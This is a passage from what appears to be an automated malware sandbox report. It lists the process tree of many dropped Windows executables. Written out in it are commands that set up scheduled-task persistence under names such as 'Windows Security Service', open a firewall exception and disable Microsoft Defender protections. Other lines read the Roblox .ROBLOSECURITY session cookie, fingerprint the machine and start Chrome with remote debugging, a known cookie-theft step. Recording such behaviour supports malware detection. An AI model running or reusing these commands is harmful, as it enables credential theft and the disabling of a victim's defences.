        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5584
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5776
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LUAIVYiGNeaD.bat" "
        8⤵
        
        PID:1704
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:5048
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4688
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2352
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bxRrYUYz9Mi9.bat" "
        10⤵
        
        PID:4500
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:2568
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1980
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4748
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\18xVaLQq2kg6.bat" "
        12⤵
        
        PID:1424
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:3668
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6124
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5468
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oGUY14fQUx6Y.bat" "
        14⤵
        
        PID:4916
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:3600
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4468
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3432
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EUjk8aTPpmEU.bat" "
        16⤵
        
        PID:6104
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:2880
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1844
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3920
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0AQ9JRhOIXsM.bat" "
        18⤵
        
        PID:6692
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:6724
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6736
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6920
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        20⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rCOZke83tgi9.bat" "
        20⤵
        
        PID:6280
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:6260
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6424
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6632
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        22⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LHYFtZRk7iUF.bat" "
        22⤵
        
        PID:6456
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:6752
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6684
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6288
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        24⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nFLOTydIeZb9.bat" "
        24⤵
        
        PID:6720
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        25⤵
        
        PID:6432
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6824
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        25⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5928
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        26⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OkFkgqLNxOIk.bat" "
        26⤵
        
        PID:2408
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        27⤵
        
        PID:6168
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6128
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        27⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4272
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        28⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7w7P7hBjVo6E.bat" "
        28⤵
        
        PID:6456
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        29⤵
        
        PID:5708
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3016
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        29⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3376
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        30⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5G6VEn3n4URD.bat" "
        30⤵
        
        PID:6868
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        31⤵
        
        PID:6652
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        31⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3676
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        31⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:664
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        32⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XFtIoMguWhHE.bat" "
        32⤵
        
        PID:6400
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        33⤵
        
        PID:5824
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6984
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        33⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4468
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        34⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\i3alJgtxcZKQ.bat" "
        34⤵
        
        PID:64
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        35⤵
        
        PID:6828
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        35⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5592
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        35⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3920
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        36⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FPUK6aZsfRWh.bat" "
        36⤵
        
        PID:4940
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        37⤵
        
        PID:4480
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6612
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        37⤵
        Checks computer location settings
        
        PID:4508
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        38⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hMjSHOZztanX.bat" "
        38⤵
        
        PID:216
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        39⤵
        
        PID:4836
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1564
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        39⤵
        Checks computer location settings
        
        PID:6652
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        40⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VFUJwOGwcYIG.bat" "
        40⤵
        
        PID:2444
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        41⤵
        
        PID:6984
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4216
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        41⤵
        Checks computer location settings
        
        PID:2636
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        42⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6412
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\N5glecv7Xqgq.bat" "
        42⤵
        
        PID:6428
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        43⤵
        
        PID:5688
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        43⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4368
        
        C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        43⤵
        Checks computer location settings
        
        PID:6564
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        44⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y3nuAzQq2Uw5.bat" "
        44⤵
        
        PID:4556
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        45⤵
        
        PID:1828
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        45⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1288
- - C:\Users\Admin\Desktop\a\dsd.exe
    "C:\Users\Admin\Desktop\a\dsd.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1244
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      PID:2000
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3692
- - C:\Users\Admin\Desktop\a\Loader.exe
    "C:\Users\Admin\Desktop\a\Loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3452
- - C:\Users\Admin\Desktop\a\output.exe
    "C:\Users\Admin\Desktop\a\output.exe"
    3⤵
    - Looks for VirtualBox Guest Additions in registry
    - Looks for VMWare Tools registry key
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Maps connected drives based on registry
    - Checks SCSI registry key(s)
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:1880
- - C:\Users\Admin\Desktop\a\saloader.exe
    "C:\Users\Admin\Desktop\a\saloader.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5320
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\Desktop\a\saloader.exe"
      4⤵
      Views/modifies file attributes
      PID:3136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\a\saloader.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:232
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      PID:6120
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:240
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:1052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4408
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5740
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\a\saloader.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:2072
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5260
- - C:\Users\Admin\Desktop\a\aidans.dont.run.exe
    "C:\Users\Admin\Desktop\a\aidans.dont.run.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2028
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"' & exit
      4⤵
      PID:4448
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC9DF.tmp.bat""
      4⤵
      PID:6048
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:4272
    - - C:\Users\Admin\AppData\Roaming\windows.exe
        
        "C:\Users\Admin\AppData\Roaming\windows.exe"
        5⤵
        Executes dropped EXE
        
        PID:220
- - C:\Users\Admin\Desktop\a\handeltest.exe
    "C:\Users\Admin\Desktop\a\handeltest.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4592
- - C:\Users\Admin\Desktop\a\xs.exe
    "C:\Users\Admin\Desktop\a\xs.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:2840
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"' & exit
      4⤵
      PID:4868
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE1EB.tmp.bat""
      4⤵
      PID:4448
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:5568
    - - C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe
        
        "C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"
        5⤵
        Executes dropped EXE
        
        PID:3684
- - C:\Users\Admin\Desktop\a\Tutorial.exe
    "C:\Users\Admin\Desktop\a\Tutorial.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1732
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4148
- - C:\Users\Admin\Desktop\a\aa.exe
    "C:\Users\Admin\Desktop\a\aa.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2564
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"' & exit
      4⤵
      PID:4156
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5184
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD7BA.tmp.bat""
      4⤵
      PID:4872
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:4480
    - - C:\Users\Admin\AppData\Roaming\atat.exe
        
        "C:\Users\Admin\AppData\Roaming\atat.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2512
- - C:\Users\Admin\Desktop\a\nobody.exe
    "C:\Users\Admin\Desktop\a\nobody.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4832
- - C:\Users\Admin\Desktop\a\ataturk.exe
    "C:\Users\Admin\Desktop\a\ataturk.exe"
    3⤵
    - Executes dropped EXE
    PID:1840
- - C:\Users\Admin\Desktop\a\start.exe
    "C:\Users\Admin\Desktop\a\start.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:708
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:404
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD808.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      PID:5164
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2660
    - - C:\Users\Admin\AppData\Roaming\System32.exe
        
        "C:\Users\Admin\AppData\Roaming\System32.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5244
- - C:\Users\Admin\Desktop\a\Winsvc.exe
    "C:\Users\Admin\Desktop\a\Winsvc.exe"
    3⤵
    PID:5592
- - C:\Users\Admin\Desktop\a\TPB-1.exe
    "C:\Users\Admin\Desktop\a\TPB-1.exe"
    3⤵
    PID:7984
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:7572
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffa71d0cc40,0x7ffa71d0cc4c,0x7ffa71d0cc58
        5⤵
        
        PID:7540
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,10763641423199328590,6850282840084274619,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1964 /prefetch:2
        5⤵
        
        PID:2104
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1848,i,10763641423199328590,6850282840084274619,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2024 /prefetch:3
        5⤵
        
        PID:7672
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
